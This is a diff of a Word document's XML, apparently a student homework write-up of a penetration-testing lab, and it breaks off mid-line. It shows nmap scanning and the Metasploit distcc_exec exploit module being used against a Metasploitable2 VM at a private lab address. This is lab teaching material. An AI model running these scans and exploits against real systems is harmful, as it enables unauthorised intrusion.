--- a/hw5/HW5.docx
+++ b/hw5/HW5.docx
@@ -4,6 +4,19 @@
   <w:body>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Problem</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>1 :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans"/>
           <w:color w:val="333333"/>
@@ -11,72 +24,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans"/>
-          <w:color w:val="333333"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>H</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>w</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans"/>
-          <w:color w:val="333333"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans"/>
-          <w:color w:val="333333"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans"/>
-          <w:color w:val="333333"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans"/>
-          <w:color w:val="333333"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Problem1 :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Open Sans"/>
-          <w:color w:val="333333"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -91,26 +38,26 @@
         <w:rPr>
           <w:rStyle w:val="fontstyle01"/>
         </w:rPr>
-        <w:t>Find the IP of the target VM with ifconfig</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve">Find the IP of the target VM with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rStyle w:val="fontstyle01"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0456A0AC" wp14:editId="7018FF2C">
-            <wp:extent cx="5943600" cy="3324225"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:extent cx="4578350" cy="2560648"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1" name="图片 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -131,7 +78,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3324225"/>
+                      <a:ext cx="4583296" cy="2563414"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -171,20 +118,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="294A3BB5" wp14:editId="4A80A0E6">
-            <wp:extent cx="5943600" cy="2375535"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:extent cx="4750433" cy="1898650"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
             <wp:docPr id="5" name="图片 5"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -205,7 +146,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2375535"/>
+                      <a:ext cx="4770603" cy="1906711"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -217,46 +158,36 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Launch service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in metasploitable2 VM:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">distccd --daemon --allow </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Launch service</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in metasploitable2 VM:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">distccd --daemon --allow </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>192.168.23.13</w:t>
       </w:r>
       <w:r>
         <w:t>2</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rStyle w:val="fontstyle01"/>
-          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -269,20 +200,22 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rStyle w:val="fontstyle01"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A637F22" wp14:editId="74058B8C">
-            <wp:extent cx="5627019" cy="3093057"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:extent cx="4008610" cy="2203450"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
             <wp:docPr id="11" name="图片 11"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -303,7 +236,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5629828" cy="3094601"/>
+                      <a:ext cx="4019980" cy="2209700"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -322,16 +255,7 @@
           <w:rStyle w:val="fontstyle01"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="CourierNewPSMT" w:hAnsi="CourierNewPSMT" w:cs="CourierNewPSMT" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -341,8 +265,10 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
         </w:rPr>
-        <w:t xml:space="preserve">nmap -p- -sS -sC -sV --open --reason </w:t>
-      </w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -352,8 +278,9 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
         </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> -p- -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -363,8 +290,9 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
         </w:rPr>
-        <w:t>v</w:t>
-      </w:r>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -374,7 +302,31 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
+        </w:rPr>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -sV --open --reason –v </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -385,29 +337,7 @@
           <w:szCs w:val="33"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>–oX</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a6"/>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="233452"/>
-          <w:sz w:val="33"/>
-          <w:szCs w:val="33"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ~/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="a6"/>
-          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
-          <w:color w:val="233452"/>
-          <w:sz w:val="33"/>
-          <w:szCs w:val="33"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">metascan.xml </w:t>
+        <w:t xml:space="preserve">–oX ~/metascan.xml </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -427,19 +357,8 @@
         <w:t>192.168.23.13</w:t>
       </w:r>
       <w:r>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">2 </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="CourierNewPSMT" w:hAnsi="CourierNewPSMT" w:cs="CourierNewPSMT"/>
@@ -458,6 +377,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLineChars="200" w:firstLine="400"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+          <w:color w:val="121212"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
           <w:color w:val="121212"/>
@@ -465,7 +395,8 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>m</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
@@ -474,8 +405,9 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
         </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
+        <w:t>sfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
@@ -484,39 +416,28 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
         </w:rPr>
-        <w:t>sfconsole</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve"> in kali VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="fontstyle01"/>
           <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
           <w:color w:val="121212"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in kali VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
-          <w:color w:val="121212"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3742A5E7" wp14:editId="34EFFF01">
-            <wp:extent cx="4837717" cy="2711395"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:extent cx="5105400" cy="2861424"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="7" name="图片 7"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -537,7 +458,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4842739" cy="2714210"/>
+                      <a:ext cx="5119717" cy="2869448"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -579,7 +500,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -592,7 +512,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t xml:space="preserve">search </w:t>
@@ -607,7 +526,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>distcc</w:t>
@@ -643,20 +561,17 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611E7E55" wp14:editId="5D8EBF4F">
-            <wp:extent cx="5601694" cy="1655971"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:extent cx="5520435" cy="1631950"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
             <wp:docPr id="9" name="图片 9"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -677,7 +592,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5604293" cy="1656739"/>
+                      <a:ext cx="5532023" cy="1635376"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -719,7 +634,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -732,7 +646,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>use exploit/</w:t>
@@ -747,7 +660,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>unix</w:t>
@@ -762,7 +674,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>/</w:t>
@@ -777,7 +688,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>misc</w:t>
@@ -792,7 +702,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>/</w:t>
@@ -807,7 +716,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>distcc_exec</w:t>
@@ -843,10 +751,22 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>show options</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -870,94 +790,8 @@
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>show options</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>The show options command will show the available parameters for the module.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:rPr>
           <w:rStyle w:val="fontstyle01"/>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cstheme="minorBidi"/>
           <w:color w:val="333333"/>
           <w:spacing w:val="3"/>
           <w:sz w:val="24"/>
@@ -965,18 +799,28 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-          <w:rFonts w:hint="eastAsia"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>The show options command will show the available parameters for the module.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="CourierNewPSMT" w:hAnsi="CourierNewPSMT" w:cs="CourierNewPSMT"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78712BC7" wp14:editId="768411FD">
@@ -1014,6 +858,84 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="CourierNewPSMT" w:hAnsi="CourierNewPSMT" w:cs="CourierNewPSMT"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>- Se</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">arch and run the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>distccd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
